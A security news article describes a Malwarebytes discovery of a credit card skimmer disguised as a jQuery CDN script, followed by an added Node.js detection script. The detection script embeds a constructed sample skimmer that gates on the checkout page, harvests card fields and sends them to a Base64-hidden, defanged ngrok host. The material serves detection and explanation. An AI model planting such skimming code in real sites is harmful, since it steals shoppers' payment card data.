Scammers disguised two domains as a content delivery network (CDN) in an attempt to quietly target visitors with a credit card skimmer.
Malwarebytes noticed something suspicious in the website code of a Parisian boutique store. At first glance, the script looked like a jQuery library loaded from a third-party CDN, but its actual contents included strings whose purpose was to look for credit card data.
Researchers at the anti-malware software provider reviewed an archived copy of the website and found that the script had not been present a few weeks earlier. They concluded that either the site owner had added the code themselves or attackers had injected the malicious content into the site's code.
Behind the CDN disguise, the credit card skimmer script checked whether the URL in the address bar matched the checkout page. Only then did it collect the form data users had entered and send it to a remote location.
That remote location was a second CDN lookalike, and the researchers found it was not the final destination. As they explained in their research:
… [A]fter checking the network traffic, we noticed this is not the actual exfiltration domain, but simply an intermediary. Instead, the GET request returns a Base64 encoded response. This string, which was already present in the original skimmer script, decodes to //d68344fb.ngrok[.]io/ad.php which turns out to be the actual exfiltration server.
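The two traits described above, a checkout-URL check paired with card-field harvesting and a Base64 literal that hides the real exfiltration endpoint, are exactly what a triage script can look for when reviewing a suspicious "CDN" file. The following is an added example, not code from Malwarebytes or from the skimmer itself: it scans a script's text for checkout and card-field patterns, decodes any Base64-looking string literals, and flags those that decode to a URL or host. The sample skimmer script below is constructed to mimic the behaviour the article describes, and the decoded endpoint is the article's own defanged value; the field names and patterns are assumptions, not indicators taken from the real sample.

```javascript
// Added example (not Malwarebytes' code): static triage of a suspected
// skimmer script. Works on Node.js with no dependencies.

// Patterns are assumptions chosen for illustration, not IOCs from the case.
const CHECKOUT_PATTERNS = [/checkout/i, /onepage/i, /paiement/i, /payment/i];
const CARD_FIELD_PATTERNS = [
  /(cc|card)[_-]?num/i,            // card number field
  /cvv|cvc/i,                      // security code field
  /exp(iry|_month|_year|date)/i,   // expiry fields
];

// A decoded literal counts as an endpoint if it is a protocol-relative or
// absolute URL, including defanged hosts such as ngrok[.]io.
function looksLikeUrl(text) {
  return /^(https?:)?\/\/[A-Za-z0-9.\[\]-]+(\/\S*)?$/.test(text);
}

// Find quoted string literals made only of Base64 alphabet characters,
// decode them, and keep those that round-trip cleanly to printable ASCII.
// The same function can be run over a fetched "CDN" response body.
function decodeBase64Literals(scriptText) {
  const literal = /["']([A-Za-z0-9+/]{16,}={0,2})["']/g;
  const hits = [];
  for (const m of scriptText.matchAll(literal)) {
    const raw = m[1];
    const decoded = Buffer.from(raw, 'base64').toString('utf8');
    // Re-encode and compare (ignoring padding) to drop long identifiers
    // that merely happen to use the Base64 alphabet.
    const reencoded = Buffer.from(decoded, 'utf8').toString('base64');
    if (reencoded.replace(/=+$/, '') !== raw.replace(/=+$/, '')) continue;
    if (!/^[\x20-\x7e]+$/.test(decoded)) continue;
    hits.push({ encoded: raw, decoded, isEndpoint: looksLikeUrl(decoded) });
  }
  return hits;
}

// Combine the indicators: a URL gate on the checkout page, several card
// field names, and at least one hidden endpoint.
function skimmerIndicators(scriptText) {
  const checkoutCheck = CHECKOUT_PATTERNS.some((p) => p.test(scriptText));
  const cardFieldHits = CARD_FIELD_PATTERNS.filter((p) => p.test(scriptText)).length;
  const hiddenEndpoints = decodeBase64Literals(scriptText)
    .filter((h) => h.isEndpoint)
    .map((h) => h.decoded);
  return {
    checkoutCheck,
    cardFieldHits,
    hiddenEndpoints,
    suspicious: checkoutCheck && cardFieldHits >= 2 && hiddenEndpoints.length > 0,
  };
}

// Constructed sample that mimics the described skimmer: a jQuery banner,
// a checkout URL gate, card fields, and a Base64 literal hiding the
// exfiltration endpoint (the article's defanged value).
const SAMPLE_SKIMMER = `
/*! jQuery v3.4.1 | (c) JS Foundation */
(function(){
  if (!/checkout/i.test(location.href)) return;
  var f = ['cc_number','cc_cvv','cc_exp_month','cc_exp_year','firstname'];
  var d = {}; f.forEach(function(n){ var e=document.querySelector('[name='+n+']'); if(e) d[n]=e.value; });
  var x = 'Ly9kNjgzNDRmYi5uZ3Jva1suXWlvL2FkLnBocA==';
  new Image().src = atob(x) + '?q=' + btoa(JSON.stringify(d));
})();
`;

// Constructed benign snippet for comparison.
const SAMPLE_BENIGN = `
(function(w){ w.$ = function(s){ return document.querySelectorAll(s); }; })(window);
`;

console.log(skimmerIndicators(SAMPLE_SKIMMER));
console.log(skimmerIndicators(SAMPLE_BENIGN));
```

The round-trip check matters in practice: long identifiers and minified variable runs match the Base64 alphabet, and without it the decoder produces a stream of false positives. Any decoded endpoint should still be confirmed against network traffic, as the researchers did, because a literal may be a decoy or an intermediary rather than the final server.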
Malwarebytes found only a handful of websites infected with this skimmer and notified the affected parties.
The attack described above highlights why web admins need to defend their sites against code injection. One way to reduce the risk is to harden the site's administrative login against brute-force attacks: use a strong, unique password and enable multi-factor authentication wherever it is available.